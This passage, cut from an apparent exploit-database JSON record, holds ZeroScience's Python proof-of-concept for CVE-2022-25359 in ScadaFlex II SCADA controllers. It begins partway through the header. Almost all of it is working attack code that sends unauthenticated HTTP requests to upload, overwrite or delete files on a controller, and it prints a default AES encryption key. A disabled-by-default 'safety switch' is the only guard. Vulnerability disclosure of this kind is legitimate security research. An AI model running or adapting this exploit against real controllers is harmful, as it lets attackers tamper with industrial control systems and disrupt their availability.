This allows\r\n# an attacker to execute critical file CRUD operations on the\r\n# device that can potentially allow system access and impact\r\n# availability.\r\n#\r\n# Tested on: SCADA HTTP Server\r\n#\r\n#\r\n# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n# @zeroscience\r\n#\r\n#\r\n# Advisory ID: ZSL-2022-5698\r\n# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5698.php\r\n#\r\n# CVE ID: CVE-2022-25359\r\n# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25359\r\n#\r\n#\r\n# 06.11.2021\r\n#\r\n\r\nimport time,sys\r\nimport requests\r\nimport datetime\r\nimport showtime\r\n\r\n# Default\r\n# AES Encryption Key = 'ABCD1234abcd:ICL'\r\n\r\ndef bann():\r\n print('''\r\n----------------------------------------------------------\r\n ) ) ) ) ) )\r\n ( ( ( ( ( (\r\n ) ) ) ) ) )\r\n (~~~~~~~~~) (~~~~~~~~~)\r\n | t00t | | w00t |\r\n | | | |\r\n I _._ I _._\r\n I /' `\\\\ I /' `\\\\\r\n I | M | I | J |\r\n f | |~~~~~~~~~~~~~~| f | |~~~~~~~~~~~~~~|\r\n .' | ||~~~~~~~~| | .' 
| | |~~~~~~~~| |\r\n/'______|___||__###___|____|/'_______|____|_|__###___|___|\r\n\r\n ScadaFlex II SCADA Controllers\r\n Remote write/delete PoC\r\n ZSL-2022-5698\r\n----------------------------------------------------------\r\n ''')\r\n\r\ndef safe(*trigger, ):\r\n return True # |-| Safety Switch\r\n\r\ndef choice(n):\r\n try:\r\n if n == 1:\r\n overwrite(controllerip = sys.argv[1], filepos = int(sys.argv[3], base = 10))\r\n elif n == 2:\r\n delete(controllerip = sys.argv[1], filepos = int(sys.argv[2], base = 10))\r\n else:\r\n print('Usage (Upload): ./sflex.py [IP] [Local file] [File position number]')\r\n print('Usage (Delete): ./sflex.py [IP] [File position number]')\r\n raise SystemExit('t00t')\r\n except Exception as tip:\r\n raise SystemExit(tip)\r\n\r\ndef jump():\r\n choice(1) if len(sys.argv) == 4 else next\r\n choice(2) if len(sys.argv) == 3 else next\r\n\r\ndef overwrite(controllerip, filepos):\r\n print('Starting script at', start)\r\n localfile = sys.argv[2]\r\n\r\n with open(localfile, 'rb') as opener:\r\n scadaurl = 'http://'\r\n scadaurl += controllerip\r\n scadaurl += '/d.php?N'\r\n scadaurl += str(filepos)\r\n scadaurl += ',73,'\r\n scadaurl += opener.name\r\n scadaurl += '~'\r\n scadaurl += str(int(time.time()))\r\n\r\n see = requests.post(scadaurl, files = {'upload' : opener})\r\n\r\n if '100' in see.text:\r\n print('File uploaded in {} directory at position {}.'.format('l', filepos))\r\n print('URL: http://' +controllerip+ '/l/' +localfile)\r\n else:\r\n print(\"- controller webserver error.\")\r\n exit()\r\n\r\ndef delete(controllerip, filepos):\r\n print('Starting script at', start)\r\n exit(42) if isinstance(filepos, str) else next\r\n\r\n scadaurl = 'http://'\r\n scadaurl += controllerip\r\n scadaurl += '/rW12IcL_Dat_N'\r\n scadaurl += str(filepos)\r\n scadaurl += ',0=1~'\r\n scadaurl += str(int(time.time()))\r\n\r\n see = requests.get(scadaurl)\r\n\r\n check = '\\x72\\x57' #|\r\n check += '\\x31\\x32' #|\r\n check += '\\x49\\x63' #|\r\n 
check += '\\x4c\\x5f' #|\r\n check += '\\x44\\x61' #|\r\n check += '\\x74\\x5f' #|\r\n check += '\\x4e'# o' #|\r\n check += str(filepos)#|\r\n check += '\\x2c\\x30' #|\r\n check += '\\x09\\x52' #|\r\n \r\n if check in see.text:\r\n print('File at position {} deleted.'.format(filepos))\r\n else:\r\n \tprint('- controller webserver error.')\r\n exit()\r\n\r\ndef main():\r\n if safe(True):\r\n print('Careful...\\nSafety: ON')\r\n exit(17)\r\n else:\r\n print('Safety: OFF', end = '')\r\n global start\r\n start = datetime.datetime.now()\r\n start = start.strftime('%d.%m.%Y %H:%M:%S')\r\n bann(), jump(), choice(1959)\r\n\r\nif __name__ == \"__main__\":\r\n main()", "sourceHref": "https://www.exploit-db.com/download/50783", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}]}